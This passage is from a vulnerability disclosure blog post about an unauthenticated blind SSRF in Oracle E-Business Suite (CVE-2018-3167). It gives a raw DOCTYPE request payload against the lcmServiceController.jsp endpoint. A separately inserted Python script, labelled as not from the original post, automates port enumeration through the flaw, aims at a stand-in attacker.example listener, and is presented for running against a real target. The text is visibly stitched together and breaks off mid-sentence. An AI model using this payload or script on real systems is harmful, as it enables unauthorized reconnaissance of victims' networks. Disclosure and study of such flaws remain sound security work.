Unauthenticated Blind SSRF in Oracle EBS

CVE-2018-3167

Every security consultant I know lets out a slight sigh when given a one-day web application assessment of a popular off-the-shelf product. Nonetheless, there are often vulnerabilities to be found, whether in the client's implementation of said product or in the product itself.

The SSRF below was found on one such test. It is fairly low risk, only allowing the enumeration of ports on internal/external hosts, but it may be of interest to some.

The Exploit

I found this exploit when fuzzing an endpoint involved in a previous XXE exploit, something I often do, as in my experience developers often make mistakes when rushing to patch a vulnerability.

During this fuzzing process I put in a basic DOCTYPE declaration and, through some "handy Collaborator" shenanigans, found that something on the server was trying to resolve the hostname in the supplied URL.

The resultant request looked something like the below request (after removing redundant headers/parameters, and redacting target details).

POST /OA_HTML/lcmServiceController.jsp HTTP/1.1
Host: victim.com
Content-Length: 56

<!DOCTYPE root PUBLIC "-//B/A/EN" "http://burpcollaboratorpayload:80">

To which… my request timed out. However, I got a DNS hit in my Burp issue log, indicating that the server was resolving the supplied hostname and that a firewall was most likely interfering with the outbound connection itself.

After trying TCP/443 (HTTPS) and getting the same result, I enlisted the help of a colleague to listen for connections across a large range of ports on an external IP, and enumerated the port number in the DOCTYPE URL accordingly ("80" in the above request).
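The port enumeration described above is easy to automate once you notice that only the port in the DOCTYPE URL changes between probes. The script below is an added example and is not code from the original post: it builds the same DOCTYPE body for each port, sends it to the vulnerable endpoint, and groups ports by a coarse response signature (timeout, HTTP status, approximate body size, slow/fast), which is how you would surface the distinct response types the firewall produces. The target URL, listener host, timeout and Content-Type header are placeholders, and the signature heuristic is my own; none of these come from the post.

```python
"""Blind-SSRF port enumeration via a DOCTYPE external identifier.

Added example, not from the original post. TARGET_URL, LISTENER_HOST,
TIMEOUT_SECONDS and the Content-Type header are assumed placeholders.
"""
import socket
import time
import urllib.error
import urllib.request
from collections import defaultdict

# Assumed placeholders: the vulnerable endpoint and the external box where
# a colleague is listening on many ports.
TARGET_URL = "https://victim.example/OA_HTML/lcmServiceController.jsp"
LISTENER_HOST = "attacker.example"
TIMEOUT_SECONDS = 10.0


def build_payload(host: str, port: int) -> bytes:
    """Same body shape as the request in the post: a DOCTYPE whose external
    identifier points at host:port. The parser fetching that DTD is the SSRF;
    only the port differs between probes."""
    return f'<!DOCTYPE root PUBLIC "-//B/A/EN" "http://{host}:{port}">'.encode()


def classify(status, body_len: int, elapsed: float, timeout: float) -> str:
    """Reduce one response to a comparable signature (my own heuristic).

    A full timeout is its own bucket; otherwise group on HTTP status, the
    body length rounded down to 64 bytes, and whether the round trip used
    more than half the timeout (a slow answer often means a filtered port)."""
    if status is None:
        return "timeout"
    sig = f"HTTP {status}, ~{body_len // 64 * 64} bytes"
    if elapsed > timeout / 2:
        sig += ", slow"
    return sig


def probe(url: str, body: bytes, timeout: float = TIMEOUT_SECONDS):
    """POST one payload and return (status or None, body length, seconds)."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/xml"},  # assumed header
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read()), time.monotonic() - start
    except urllib.error.HTTPError as err:           # non-2xx still counts
        return err.code, len(err.read()), time.monotonic() - start
    except (urllib.error.URLError, socket.timeout, TimeoutError):
        return None, 0, time.monotonic() - start


def probe_port(port: int):
    """Probe the real target with the listener host and the given port."""
    return probe(TARGET_URL, build_payload(LISTENER_HOST, port))


def group_ports(ports, send=probe_port, timeout: float = TIMEOUT_SECONDS) -> dict:
    """Send one probe per port and bucket ports by response signature.

    `send` is injectable so the grouping logic can be exercised offline."""
    groups = defaultdict(list)
    for port in ports:
        status, body_len, elapsed = send(port)
        groups[classify(status, body_len, elapsed, timeout)].append(port)
    return dict(groups)


if __name__ == "__main__":
    # Sequential on purpose: the SSRF fetch is server-side, and a burst of
    # parallel probes would skew the timing signal the grouping relies on.
    for sig, port_list in group_ports(range(1, 1025)).items():
        print(f"{sig}: {port_list}")
```

Run it against the real target only with the listener up, then compare the buckets with what the listener actually received: a port that reaches the listener but still lands in the "timeout" bucket tells you the firewall is allowing the SYN out but dropping or delaying something on the way back.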

This resulted in three types of responses